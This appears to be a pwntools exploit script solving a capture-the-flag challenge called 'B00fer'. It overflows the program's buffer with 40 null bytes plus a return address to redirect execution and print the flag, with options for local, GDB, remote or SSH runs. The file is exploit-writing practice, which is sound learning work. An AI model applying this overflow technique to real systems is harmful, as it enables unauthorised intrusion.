#!/usr/bin/python3
from pwn import *

# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    elif args.SSH:
        exe = remote_exe
        s=ssh(host='HOST',user='LOGIN',password='PASSWORD',port=0000)
        return s.process([exe] + argv)
    else:  # Run locally
        exe = local_exe
        return process([exe] + argv, *a, **kw)


# Specify your GDB script here for debugging
gdbscript = '''
'''.format(**locals())


# Set up pwntools for the correct architecture
local_exe = 'B00fer'
remote_exe = 'REMOTE'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(local_exe, checksec=False)
# Change logging level to help with debugging (error/warning/info/debug)
#context.log_level = 'debug'
context.log_level = 'error'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

payload = flat(
        b'\x00'*5*8,
        p64(0x401227) 
        )

write("payload", payload)

io = start()

io.sendlineafter(b'Hi there NICC! This program is 100% and there is NO WAY you are getting our flag.\n', payload)

io.recvline().decode()
print(io.recvline().decode())